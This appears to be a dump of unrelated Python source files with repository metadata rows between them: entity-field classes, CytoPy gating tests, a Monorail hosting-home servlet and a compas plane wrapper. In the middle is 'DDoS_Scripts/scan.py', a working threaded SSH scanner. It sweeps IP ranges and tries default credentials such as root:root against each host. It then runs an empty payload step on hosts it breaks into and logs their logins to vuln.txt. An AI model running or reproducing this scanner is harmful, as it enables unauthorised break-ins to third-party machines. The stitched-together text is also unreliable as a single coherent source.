        @overload
        def __get__(self, obj: Any, cls: Any = None) -> T:
            ...

        def __get__(self, obj: Any, cls: Any = None) -> Any:
            ...

        def __set__(self, obj: Any, value: T) -> None:
            ...
class CompoundField(BaseField, Generic[TC]):
    """Field consisting of a single compound value."""

    def __init__(self,
                 d_key: str,
                 value: TC,
                 store_default: bool = True) -> None:
        super().__init__(d_key)
        if __debug__:
            from efro.entity._value import CompoundValue
            assert isinstance(value, CompoundValue)
            assert not hasattr(value, 'd_data')
        self.d_value = value
        self._store_default = store_default

    def get_default_data(self) -> dict:
        return self.d_value.get_default_data()

    def filter_input(self, data: Any, error: bool) -> dict:
        return self.d_value.filter_input(data, error)

    def prune_data(self, data: Any) -> bool:
        return self.d_value.prune_data(data)

    # Note:
    # Currently, to the type-checker we just return a simple instance
    # of our CompoundValue so it can properly type-check access to its
    # attrs. However at runtime we return a FieldInspector or
    # BoundCompoundField which both use magic to provide the same attrs
    # dynamically (but which the type-checker doesn't understand).
    # Perhaps at some point we can write a mypy plugin to correct this.
    if TYPE_CHECKING:

        def __get__(self, obj: Any, cls: Any = None) -> TC:
            ...

        # Theoretically this type-checking may be too tight;
        # we can support assigning a parent class to a child class if
        # their fields match. Not sure if that'll ever come up though;
        # gonna leave this for now as I prefer to have *some* checking.
        # Also once we get BoundCompoundValues working with mypy we'll
        # need to accept those too.
        def __set__(self: CompoundField[TC], obj: Any, value: TC) -> None:
            ...

    def get_with_data(self, data: Any) -> Any:
        """Return a bound view of this field over the provided data."""
        assert self.d_key in data
        return BoundCompoundValue(self.d_value, data[self.d_key])

    def set_with_data(self, data: Any, value: Any, error: bool) -> Any:
        """Assign *value* (a bound compound value) into *data*.

        Raises ValueError for unbound values or mismatched field sets.
        """
        from efro.entity._value import CompoundValue

        # Ok here's the deal: our type checking above allows any subtype
        # of our CompoundValue in here, but we want to be more picky than
        # that. Let's check fields for equality. This way we'll allow
        # assigning something like a Carentity to a Car field
        # (where the data is the same), but won't allow assigning a Car
        # to a Vehicle field (as Car probably adds more fields).
        value1: CompoundValue
        if isinstance(value, BoundCompoundValue):
            value1 = value.d_value
        elif isinstance(value, CompoundValue):
            value1 = value
        else:
            raise ValueError(f"Can't assign from object type {type(value)}")
        dataval = getattr(value, 'd_data', None)
        if dataval is None:
            raise ValueError(f"Can't assign from unbound object {value}")
        if self.d_value.get_fields() != value1.get_fields():
            # Bug fix: format value1 here. A plain CompoundValue that
            # carries d_data has no .d_value attr, so the original
            # f'{value.d_value}' raised AttributeError and masked this
            # intended ValueError. (For BoundCompoundValue the message
            # is unchanged, since value.d_value IS value1.)
            raise ValueError(f"Can't assign to {self.d_value} from"
                             f' incompatible type {value1}; '
                             f'sub-fields do not match.')

        # If we're allowing this to go through, we can simply copy the
        # data from the passed in value. The fields match so it should
        # be in a valid state already.
        data[self.d_key] = copy.deepcopy(dataval)
class ListField(BaseField, Generic[T]):
    """Field consisting of repeated values."""

    def __init__(self,
                 d_key: str,
                 value: TypedValue[T],
                 store_default: bool = True) -> None:
        super().__init__(d_key)
        self.d_value = value
        self._store_default = store_default

    def get_default_data(self) -> list:
        return []

    def filter_input(self, data: Any, error: bool) -> Any:
        """Validate incoming list data, filtering each entry in place."""
        # If we were passed a BoundListField, operate on its raw values
        if isinstance(data, BoundListField):
            data = data.d_data
        if not isinstance(data, list):
            if error:
                raise TypeError(f'list value expected; got {type(data)}')
            # Non-error mode: log and fall back to an empty list.
            logging.error('Ignoring non-list data for %s: %s', self, data)
            data = []
        for i, entry in enumerate(data):
            data[i] = self.d_value.filter_input(entry, error=error)
        return data

    def prune_data(self, data: Any) -> bool:
        # We never prune individual values since that would fundamentally
        # change the list, but we can prune completely if empty (and allowed).
        return not data and not self._store_default

    # When accessed on a FieldInspector we return a sub-field FieldInspector.
    # When accessed on an instance we return a BoundListField.
    # noinspection DuplicatedCode
    if TYPE_CHECKING:
        # Access via type gives our field; via an instance gives a bound field.
        @overload
        def __get__(self, obj: None, cls: Any = None) -> ListField[T]:
            ...

        @overload
        def __get__(self, obj: Any, cls: Any = None) -> BoundListField[T]:
            ...

        def __get__(self, obj: Any, cls: Any = None) -> Any:
            ...

        # Allow setting via a raw value list or a bound list field
        @overload
        def __set__(self, obj: Any, value: List[T]) -> None:
            ...

        @overload
        def __set__(self, obj: Any, value: BoundListField[T]) -> None:
            ...

        def __set__(self, obj: Any, value: Any) -> None:
            ...

    def get_with_data(self, data: Any) -> Any:
        return BoundListField(self, data[self.d_key])
class DictField(BaseField, Generic[TK, T]):
    """A field of values in a dict with a specified index type."""

    def __init__(self,
                 d_key: str,
                 keytype: Type[TK],
                 field: TypedValue[T],
                 store_default: bool = True) -> None:
        super().__init__(d_key)
        self.d_value = field
        self._store_default = store_default
        self._keytype = keytype

    def get_default_data(self) -> dict:
        return {}

    # noinspection DuplicatedCode
    def filter_input(self, data: Any, error: bool) -> Any:
        """Validate incoming dict data: check key types and filter values."""
        # If we were passed a BoundDictField, operate on its raw values
        if isinstance(data, BoundDictField):
            data = data.d_data
        if not isinstance(data, dict):
            if error:
                raise TypeError('dict value expected')
            # Non-error mode: log and fall back to an empty dict.
            logging.error('Ignoring non-dict data for %s: %s', self, data)
            data = {}
        data_out = {}
        for key, val in data.items():
            if not isinstance(key, self._keytype):
                if error:
                    raise TypeError('invalid key type')
                # Non-error mode: drop the offending entry.
                logging.error('Ignoring invalid key type for %s: %s', self,
                              data)
                continue
            data_out[key] = self.d_value.filter_input(val, error=error)
        return data_out

    def prune_data(self, data: Any) -> bool:
        # We never prune individual values since that would fundamentally
        # change the dict, but we can prune completely if empty (and allowed)
        return not data and not self._store_default

    # noinspection DuplicatedCode
    if TYPE_CHECKING:
        # Return our field if accessed via type and bound-dict-field
        # if via instance.
        @overload
        def __get__(self, obj: None, cls: Any = None) -> DictField[TK, T]:
            ...

        @overload
        def __get__(self, obj: Any, cls: Any = None) -> BoundDictField[TK, T]:
            ...

        def __get__(self, obj: Any, cls: Any = None) -> Any:
            ...

        # Allow setting via matching dict values or BoundDictFields
        @overload
        def __set__(self, obj: Any, value: Dict[TK, T]) -> None:
            ...

        @overload
        def __set__(self, obj: Any, value: BoundDictField[TK, T]) -> None:
            ...

        def __set__(self, obj: Any, value: Any) -> None:
            ...

    def get_with_data(self, data: Any) -> Any:
        return BoundDictField(self._keytype, self, data[self.d_key])
class CompoundListField(BaseField, Generic[TC]):
    """A field consisting of repeated instances of a compound-value.

    Element access returns the sub-field, allowing nested field access.
    ie: mylist[10].fieldattr = 'foo'
    """

    def __init__(self,
                 d_key: str,
                 valuetype: TC,
                 store_default: bool = True) -> None:
        super().__init__(d_key)
        # Child compound-value describing each list entry.
        self.d_value = valuetype
        # This doesnt actually exist for us, but want the type-checker
        # to think it does (see TYPE_CHECKING note below).
        self.d_data: Any
        self._store_default = store_default

    def filter_input(self, data: Any, error: bool) -> list:
        """Validate raw input and return a list of validated entries.

        Non-list input raises (error=True) or is logged and replaced by
        an empty list (error=False).
        """
        if not isinstance(data, list):
            if error:
                raise TypeError('list value expected')
            logging.error('Ignoring non-list data for %s: %s', self, data)
            data = []
        assert isinstance(data, list)
        # Ok we've got a list; now run everything in it through validation.
        # NOTE(review): entries are validated in place, mutating the
        # caller-supplied list — confirm callers do not rely on it.
        for i, subdata in enumerate(data):
            data[i] = self.d_value.filter_input(subdata, error=error)
        return data

    def get_default_data(self) -> list:
        return []

    def prune_data(self, data: Any) -> bool:
        # Run pruning on all individual entries' data through out child field.
        # However we don't *completely* prune values from the list since that
        # would change it.
        for subdata in data:
            self.d_value.prune_fields_data(subdata)
        # We can also optionally prune the whole list if empty and allowed.
        return not data and not self._store_default

    # noinspection DuplicatedCode
    if TYPE_CHECKING:
        # Typing-only overloads: class access returns the field itself;
        # instance access returns a bound view over the instance data.
        @overload
        def __get__(self, obj: None, cls: Any = None) -> CompoundListField[TC]:
            ...

        @overload
        def __get__(self,
                    obj: Any,
                    cls: Any = None) -> BoundCompoundListField[TC]:
            ...

        def __get__(self, obj: Any, cls: Any = None) -> Any:
            ...

        # Note:
        # When setting the list, we tell the type-checker that we also accept
        # a raw list of CompoundValue objects, but at runtime we actually
        # always deal with BoundCompoundValue objects (see note in
        # BoundCompoundListField for why we accept CompoundValue objs)
        @overload
        def __set__(self, obj: Any, value: List[TC]) -> None:
            ...

        @overload
        def __set__(self, obj: Any, value: BoundCompoundListField[TC]) -> None:
            ...

        def __set__(self, obj: Any, value: Any) -> None:
            ...

    def get_with_data(self, data: Any) -> Any:
        """Return a BoundCompoundListField view over our entry in *data*."""
        assert self.d_key in data
        return BoundCompoundListField(self, data[self.d_key])

    def set_with_data(self, data: Any, value: Any, error: bool) -> Any:
        """Assign a full list of BoundCompoundValue entries to this field.

        Raises TypeError for non-list input and ValueError for entries
        that do not share this field's compound-value layout.
        """
        # If we were passed a BoundCompoundListField,
        # simply convert it to a flat list of BoundCompoundValue objects which
        # is what we work with natively here.
        if isinstance(value, BoundCompoundListField):
            value = list(value)
        if not isinstance(value, list):
            raise TypeError(f'CompoundListField expected list value on set;'
                            f' got {type(value)}.')
        # Allow assigning only from a sequence of our existing children.
        # (could look into expanding this to other children if we can
        # be sure the underlying data will line up; for example two
        # CompoundListFields with different child_field values should not
        # be inter-assignable.
        if not all(isinstance(i, BoundCompoundValue) for i in value):
            raise ValueError('CompoundListField assignment must be a '
                             'list containing only BoundCompoundValue objs.')
        # Make sure the data all has the same CompoundValue type and
        # compare that type against ours once to make sure its fields match.
        # (this will not allow passing CompoundValues from multiple sources
        # but I don't know if that would ever come up..)
        for i, val in enumerate(value):
            if i == 0:
                # Do the full field comparison on the first value only..
                if not have_matching_fields(val.d_value, self.d_value):
                    raise ValueError(
                        'CompoundListField assignment must be a '
                        'list containing matching CompoundValues.')
            else:
                # For all remaining values, just ensure they match the first.
                if val.d_value is not value[0].d_value:
                    raise ValueError(
                        'CompoundListField assignment cannot contain '
                        'multiple CompoundValue types as sources.')
        data[self.d_key] = self.filter_input([i.d_data for i in value],
                                             error=error)
class CompoundDictField(BaseField, Generic[TK, TC]):
    """A field consisting of key-indexed instances of a compound-value.

    Element access returns the sub-field, allowing nested field access.
    ie: mylist[10].fieldattr = 'foo'
    """

    def __init__(self,
                 d_key: str,
                 keytype: Type[TK],
                 valuetype: TC,
                 store_default: bool = True) -> None:
        super().__init__(d_key)
        # Child compound-value describing each dict entry's value.
        self.d_value = valuetype
        # This doesnt actually exist for us, but want the type-checker
        # to think it does (see TYPE_CHECKING note below).
        self.d_data: Any
        self.d_keytype = keytype
        self._store_default = store_default

    # noinspection DuplicatedCode
    def filter_input(self, data: Any, error: bool) -> dict:
        """Validate raw input and return a dict of validated entries.

        With error=True, invalid containers/keys raise TypeError; with
        error=False they are logged and dropped/replaced. Values are
        validated recursively through the child compound-value.
        """
        if not isinstance(data, dict):
            if error:
                raise TypeError('dict value expected')
            logging.error('Ignoring non-dict data for %s: %s', self, data)
            data = {}
        data_out = {}
        for key, val in data.items():
            if not isinstance(key, self.d_keytype):
                if error:
                    raise TypeError('invalid key type')
                logging.error('Ignoring invalid key type for %s: %s', self,
                              data)
                continue
            data_out[key] = self.d_value.filter_input(val, error=error)
        return data_out

    def get_default_data(self) -> dict:
        return {}

    def prune_data(self, data: Any) -> bool:
        # Run pruning on all individual entries' data through our child field.
        # However we don't *completely* prune values from the dict since that
        # would change it.
        for subdata in data.values():
            self.d_value.prune_fields_data(subdata)
        # We can also optionally prune the whole dict if empty and allowed.
        return not data and not self._store_default

    # ONLY overriding these in type-checker land to clarify types.
    # (see note in BaseField)
    # noinspection DuplicatedCode
    if TYPE_CHECKING:

        @overload
        def __get__(self,
                    obj: None,
                    cls: Any = None) -> CompoundDictField[TK, TC]:
            ...

        @overload
        def __get__(self,
                    obj: Any,
                    cls: Any = None) -> BoundCompoundDictField[TK, TC]:
            ...

        def __get__(self, obj: Any, cls: Any = None) -> Any:
            ...

        # Note:
        # When setting the dict, we tell the type-checker that we also accept
        # a raw dict of CompoundValue objects, but at runtime we actually
        # always deal with BoundCompoundValue objects (see note in
        # BoundCompoundDictField for why we accept CompoundValue objs)
        @overload
        def __set__(self, obj: Any, value: Dict[TK, TC]) -> None:
            ...

        @overload
        def __set__(self, obj: Any, value: BoundCompoundDictField[TK,
                                                                  TC]) -> None:
            ...

        def __set__(self, obj: Any, value: Any) -> None:
            ...

    def get_with_data(self, data: Any) -> Any:
        """Return a BoundCompoundDictField view over our entry in *data*."""
        assert self.d_key in data
        return BoundCompoundDictField(self, data[self.d_key])

    def set_with_data(self, data: Any, value: Any, error: bool) -> Any:
        """Assign a full dict of BoundCompoundValue entries to this field.

        Raises TypeError for non-dict input and ValueError for entries
        that do not share this field's compound-value layout.
        """
        # If we were passed a BoundCompoundDictField,
        # simply convert it to a flat dict of BoundCompoundValue objects which
        # is what we work with natively here.
        if isinstance(value, BoundCompoundDictField):
            value = dict(value.items())
        if not isinstance(value, dict):
            raise TypeError('CompoundDictField expected dict value on set.')
        # Allow assigning only from a sequence of our existing children.
        # (could look into expanding this to other children if we can
        # be sure the underlying data will line up; for example two
        # CompoundDictFields with different child_field values should not
        # be inter-assignable.
        if (not all(isinstance(i, BoundCompoundValue)
                    for i in value.values())):
            raise ValueError('CompoundDictField assignment must be a '
                             'dict containing only BoundCompoundValues.')
        # Make sure the data all has the same CompoundValue type and
        # compare that type against ours once to make sure its fields match.
        # (this will not allow passing CompoundValues from multiple sources
        # but I don't know if that would ever come up..)
        first_value: Any = None
        for i, val in enumerate(value.values()):
            if i == 0:
                first_value = val.d_value
                # Do the full field comparison on the first value only..
                if not have_matching_fields(val.d_value, self.d_value):
                    # Fixed copy-paste from CompoundListField: the message
                    # previously said "CompoundListField ... list ...".
                    raise ValueError(
                        'CompoundDictField assignment must be a '
                        'dict containing matching CompoundValues.')
            else:
                # For all remaining values, just ensure they match the first.
                if val.d_value is not first_value:
                    raise ValueError(
                        'CompoundDictField assignment cannot contain '
                        'multiple CompoundValue types as sources.')
        data[self.d_key] = self.filter_input(
            {key: val.d_data
             for key, val in value.items()}, error=error)
| 38.309028
| 79
| 0.598704
|
4a0a4755c849160343f0d27df0aa86b46ee30b5e
| 4,349
|
py
|
Python
|
CytoPy/tests/test_flow/test_utilities.py
|
fabbondanza/CytoPy
|
74baea59cfe9e9f664b6b1bf7abf9847f34893eb
|
[
"MIT"
] | null | null | null |
CytoPy/tests/test_flow/test_utilities.py
|
fabbondanza/CytoPy
|
74baea59cfe9e9f664b6b1bf7abf9847f34893eb
|
[
"MIT"
] | null | null | null |
CytoPy/tests/test_flow/test_utilities.py
|
fabbondanza/CytoPy
|
74baea59cfe9e9f664b6b1bf7abf9847f34893eb
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('/home/ross/CytoPy')
from CytoPy.data.mongo_setup import global_init
from CytoPy.flow.gating import utilities
from CytoPy.tests import make_example_date
from sklearn.neighbors import KernelDensity
from scipy.signal import find_peaks
from itertools import combinations
import numpy as np
import pandas as pd
import unittest
global_init('test')
class TestCheckPeak(unittest.TestCase):
    """check_peak should keep only peaks whose probability clears ``t``."""

    def test(self):
        probability = np.array([0, 0, 0, 0.05, 0, 0, 2, 0, 0, 3, 0, 0, 0.05])
        candidates = np.where(np.array(probability) > 0)[0]
        # Lower thresholds admit the small 0.05 peaks as well.
        for threshold, expected_count in ((0.5, 2), (0.1, 2), (0.01, 4)):
            surviving = utilities.check_peak(candidates, probability,
                                             t=threshold)
            self.assertEqual(len(surviving), expected_count)
class TestFindLocalMinima(unittest.TestCase):
    """find_local_minima should locate the density valley between peaks."""

    @staticmethod
    def _build():
        # Down-sample blob 2 so the 1-D KDE over feature0 produces
        # clearly separated modes with a valley between them.
        data = make_example_date()
        data = pd.concat([data[data.blobID != 2],
                          data[data.blobID == 2].sample(frac=0.25)])
        d = data['feature0'].values
        density = KernelDensity(bandwidth=0.5, kernel='gaussian')
        density.fit(d[:, None])
        x_d = np.linspace(min(d), max(d), 1000)
        # score_samples returns log-density; exponentiate back.
        prob = np.exp(density.score_samples(x_d[:, None]))
        peaks = find_peaks(prob)[0]
        return prob, peaks, x_d

    def test(self):
        prob, peaks, x_d = self._build()
        threshold = utilities.find_local_minima(prob, x_d, peaks)
        # Expected valley location for the fixed example data.
        self.assertTrue(0.58 <= threshold <= 0.6)
class TestInsideEllipse(unittest.TestCase):
    """inside_ellipse should select exactly the points of blob 1."""

    @staticmethod
    def _build():
        data = make_example_date()
        # Ellipse hand-placed around blob 1 in (feature0, feature1) space.
        mask = utilities.inside_ellipse(data[['feature0', 'feature1']].values,
                                        center=(4.5, 2.5),
                                        width=2.3,
                                        height=3,
                                        angle=0)
        return data, mask

    def test(self):
        data, mask = self._build()
        # Every masked point must belong to blob 1.
        correct = all(x == 1 for x in data.loc[mask].blobID.values)
        self.assertTrue(correct)
class TestRectangularFilter(unittest.TestCase):
    """rectangular_filter should keep only rows inside the rectangle
    (hand-placed here around blob 1)."""

    def test(self):
        data = make_example_date()
        rect = dict(xmin=0, xmax=8, ymin=-2.5, ymax=6.0)
        self.assertTrue(all(x == 1 for x in utilities.rectangular_filter(data,
                                                                         x='feature0',
                                                                         y='feature1',
                                                                         definition=rect).blobID.values))
class TestDensityDependentDownsample(unittest.TestCase):
    """Density-dependent downsampling should roughly preserve the
    relative sizes of the blobs."""

    @staticmethod
    def _equal_ratio(data, samples):
        # Pairwise size ratios between the blob IDs present in the
        # sample, measured on the original data; test() then compares
        # pairs of these ratios for approximate equality.
        ratios = [data[data.blobID == x[0]].shape[0] / data[data.blobID == x[1]].shape[0]
                  for x in combinations(samples.blobID.unique(), 2)]
        return combinations(ratios, 2)

    def test(self):
        data = make_example_date(n_samples=10000)
        samples = utilities.density_dependent_downsample(data=data,
                                                         features=['feature0', 'feature1'],
                                                         mmd_sample_n=2000)
        for x, y in self._equal_ratio(data, samples):
            # Loose tolerance: downsampling is stochastic.
            self.assertAlmostEqual(x, y, places=1)
class TestGetParams(unittest.TestCase):
    """Tests for utilities.get_params signature introspection."""

    class MakeshiftClass:
        # Dummy class whose __init__ signature is introspected below.
        def __init__(self, a, b, c, d='test', **kwargs):
            pass

    def test_basic(self):
        self.assertListEqual(utilities.get_params(self.MakeshiftClass),
                             ['a', 'b', 'c', 'd'])

    def test_include_kwargs(self):
        # Fixed: was named `include_kwargs`, so unittest never ran it.
        self.assertListEqual(utilities.get_params(self.MakeshiftClass, exclude_kwargs=False),
                             ['a', 'b', 'c', 'd', 'kwargs'])

    def test_required_only(self):
        # Fixed typo in the method name ("requied" -> "required").
        self.assertListEqual(utilities.get_params(self.MakeshiftClass, required_only=True),
                             ['a', 'b', 'c'])

    def test_required_only_exclude_kwargs(self):
        self.assertListEqual(utilities.get_params(self.MakeshiftClass,
                                                  required_only=True,
                                                  exclude_kwargs=True),
                             ['a', 'b', 'c'])
if __name__ == '__main__':
unittest.main()
| 38.149123
| 105
| 0.551391
|
4a0a4772da8fe89c13bbcea10e9223aa128769d6
| 4,931
|
py
|
Python
|
DDoS_Scripts/scan.py
|
thexaoulm/dos
|
fd8a3bc623e7615df062edde34e5972a0545d668
|
[
"MIT"
] | 2
|
2020-05-26T12:51:01.000Z
|
2021-12-24T01:27:52.000Z
|
DDoS_Scripts/scan.py
|
thexaoulm/dos
|
fd8a3bc623e7615df062edde34e5972a0545d668
|
[
"MIT"
] | null | null | null |
DDoS_Scripts/scan.py
|
thexaoulm/dos
|
fd8a3bc623e7615df062edde34e5972a0545d668
|
[
"MIT"
] | 1
|
2021-10-10T03:45:08.000Z
|
2021-10-10T03:45:08.000Z
|
# Voids hacka scanna
# nano /usr/include/bits/typesizes.h -> change 99999 to 99999
# ulimit -n 99999
# python scan.py 1000 <start-range> <end-range>
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null")
server_ip = "208.67.1.26"
blacklisted = ["127.0","10.0","192.168"]
passwords = ["admin:1234"]
if sys.argv[4] == "root":
passwords = ["root:root"]
if sys.argv[4] == "guest":
passwords = ["guest:guest"]
if sys.argv[4] == "telnet":
passwords = ["telnet:telnet"]
if len(sys.argv) < 4:
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
print """\n\x1b[0;37m******************************
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
******************************\x1b[0m"""
def sshscanner(ip):
global passwords
try:
thisipisbad='no'
for badip in blacklisted:
if badip in ip:
thisipisbad='yes'
if thisipisbad=='yes':
sys.exit()
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((ip, port))
data = str(s.recv(99999))
if "SSH" in data:
print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
elif "ssh" in data:
print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
else:
sys.exit()
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
break
except:
pass
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
if badserver == False:
print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
ssh.exec_command("")
vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
time.sleep(12)
ssh.close()
except Exception as e:
pass
if sys.argv[2] == "LUCKY":
ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
if sys.argv[2] != "LUCKY":
a = int(sys.argv[2].split(".")[0])
b = int(sys.argv[2].split(".")[1])
c = int(sys.argv[2].split(".")[2])
d = int(sys.argv[2].split(".")[3])
else:
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
x = 0
while(True):
try:
if sys.argv[2] != "LUCKY":
endaddr = sys.argv[3]
else:
endaddr = endrng
d += 1
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
if sys.argv[2] == "LUCKY":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if d > 255:
c += 1
d = 0
if c > 255:
b += 1
c = 0
if b > 255:
a += 1
b = 0
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if ipaddr == endaddr:
if sys.argv[2] == "LUCKY":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if x > 500:
time.sleep(1)
x = 0
t = threading.Thread(target=sshscanner, args=(ipaddr,))
t.start()
except Exception as e:
pass
print "\x1b[37mDone\x1b[37m"
| 29.884848
| 129
| 0.468262
|
4a0a47dc486ca8d88586c1ba8b81d1a0db242f24
| 3,955
|
py
|
Python
|
appengine/monorail/sitewide/hostinghome.py
|
xswz8015/infra
|
f956b78ce4c39cc76acdda47601b86794ae0c1ba
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/monorail/sitewide/hostinghome.py
|
xswz8015/infra
|
f956b78ce4c39cc76acdda47601b86794ae0c1ba
|
[
"BSD-3-Clause"
] | 7
|
2022-02-15T01:11:37.000Z
|
2022-03-02T12:46:13.000Z
|
appengine/monorail/sitewide/hostinghome.py
|
NDevTK/chromium-infra
|
d38e088e158d81f7f2065a38aa1ea1894f735ec4
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""A class to display the hosting home page."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import logging
import ezt
import settings
from businesslogic import work_env
from framework import exceptions
from framework import permissions
from framework import servlet
from framework import template_helpers
from framework import urls
from project import project_views
from sitewide import projectsearch
from sitewide import sitewide_helpers
class HostingHome(servlet.Servlet):
    """HostingHome shows the project list and link to create a project."""

    _PAGE_TEMPLATE = 'sitewide/hosting-home-page.ezt'

    def GatherPageData(self, mr):
        """Build up a dictionary of data values to use when rendering the page.

        Args:
            mr: commonly used info parsed from the request.

        Returns:
            Dict of values used by EZT for rendering the page.
        """
        redirect_msg = self._MaybeRedirectToDomainDefaultProject(mr)
        logging.info(redirect_msg)
        can_create_project = permissions.CanCreateProject(mr.perms)

        # Kick off the search pipeline, it has its own promises for parallelism.
        pipeline = projectsearch.ProjectSearchPipeline(mr, self.services)

        # Meanwhile, determine which projects the signed-in user has starred.
        with work_env.WorkEnv(mr, self.services) as we:
            starred_projects = we.ListStarredProjects()
            starred_project_ids = {p.project_id for p in starred_projects}

        # A dict of project id to the user's membership status.
        project_memberships = {}
        if mr.auth.user_id:
            with work_env.WorkEnv(mr, self.services) as we:
                owned, _archive_owned, member_of, contrib_of = (
                    we.GetUserProjects(mr.auth.effective_ids))
            # NOTE(review): later updates overwrite earlier entries, so a
            # project appearing in several groups keeps the LAST matching
            # label (Contributor) — confirm this precedence is intended.
            project_memberships.update({proj.project_id: 'Owner' for proj in owned})
            project_memberships.update(
                {proj.project_id: 'Member' for proj in member_of})
            project_memberships.update(
                {proj.project_id: 'Contributor' for proj in contrib_of})

        # Finish the project search pipeline.
        pipeline.SearchForIDs(domain=mr.request.host)
        pipeline.GetProjectsAndPaginate(mr.cnxn, urls.HOSTING_HOME)
        project_ids = [p.project_id for p in pipeline.visible_results]
        star_count_dict = self.services.project_star.CountItemsStars(
            mr.cnxn, project_ids)

        # Make ProjectView objects
        project_view_list = [
            project_views.ProjectView(
                p, starred=p.project_id in starred_project_ids,
                num_stars=star_count_dict.get(p.project_id),
                membership_desc=project_memberships.get(p.project_id))
            for p in pipeline.visible_results]
        return {
            'can_create_project': ezt.boolean(can_create_project),
            'learn_more_link': settings.learn_more_link,
            'projects': project_view_list,
            'pagination': pipeline.pagination,
        }

    def _MaybeRedirectToDomainDefaultProject(self, mr):
        """If there is a relevant default project, redirect to it.

        Returns a human-readable status string for logging. When a
        redirect fires, self.redirect(..., abort=True) is called —
        presumably aborting normal request handling; confirm against
        servlet.Servlet.redirect.
        """
        project_name = settings.domain_to_default_project.get(mr.request.host)
        if not project_name:
            return 'No configured default project redirect for this domain.'

        project = None
        try:
            project = self.services.project.GetProjectByName(mr.cnxn, project_name)
        except exceptions.NoSuchProjectException:
            pass
        if not project:
            return 'Domain default project %s not found' % project_name

        # Only redirect if the requesting user may actually view it.
        if not permissions.UserCanViewProject(
                mr.auth.user_pb, mr.auth.effective_ids, project):
            return 'User cannot view default project: %r' % project

        project_url = '/p/%s' % project_name
        self.redirect(project_url, abort=True)
        return 'Redirected to %r' % project_url
| 36.62037
| 78
| 0.733502
|
4a0a48445aba68d00888a8e2ebb082177903377e
| 3,462
|
py
|
Python
|
src/compas_rhino/geometry/plane.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | null | null | null |
src/compas_rhino/geometry/plane.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | null | null | null |
src/compas_rhino/geometry/plane.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas
from compas.geometry import Plane
from compas.geometry import Frame
from compas_rhino.geometry.base import BaseRhinoGeometry
if compas.RHINO:
import Rhino
__all__ = ['RhinoPlane']
class RhinoPlane(BaseRhinoGeometry):
    """Wrapper for a Rhino plane objects.

    Attributes
    ----------
    point (read-only) : :class:`Rhino.Geometry.Point3d`
        Base point of the plane.
    normal (read-only) : :class:`Rhino.Geometry.Vector3d`
        The normal vector of the plane.
    xaxis (read-only) : :class:`Rhino.Geometry.Vector3d`
        The X axis of the plane.
    yaxis (read-only) : :class:`Rhino.Geometry.Vector3d`
        The Y axis of the plane.

    Notes
    -----
    In Rhino, a plane and a frame are equivalent.
    Therefore, the COMPAS conversion function of this class returns a frame object instead of a plane.
    """

    def __init__(self):
        super(RhinoPlane, self).__init__()

    @property
    def point(self):
        return self.geometry.Origin

    @property
    def normal(self):
        return self.geometry.Normal

    @property
    def xaxis(self):
        return self.geometry.XAxis

    @property
    def yaxis(self):
        return self.geometry.YAxis

    @classmethod
    def from_geometry(cls, geometry):
        """Construct a plane wrapper from an existing geometry object.

        Parameters
        ----------
        geometry : tuple of point and normal or :class:`Rhino.Geometry.Plane` or :class:`compas.geometry.Plane` or :class:`compas.geometry.Frame`
            The geometry object defining a plane.

        Returns
        -------
        :class:`compas_rhino.geometry.RhinoPlane`
            The wrapped plane.
        """
        if not isinstance(geometry, Rhino.Geometry.Plane):
            if isinstance(geometry, Frame):
                # A frame fixes the in-plane axes explicitly.
                point = Rhino.Geometry.Point3d(geometry[0][0], geometry[0][1], geometry[0][2])
                xaxis = Rhino.Geometry.Vector3d(geometry[1][0], geometry[1][1], geometry[1][2])
                yaxis = Rhino.Geometry.Vector3d(geometry[2][0], geometry[2][1], geometry[2][2])
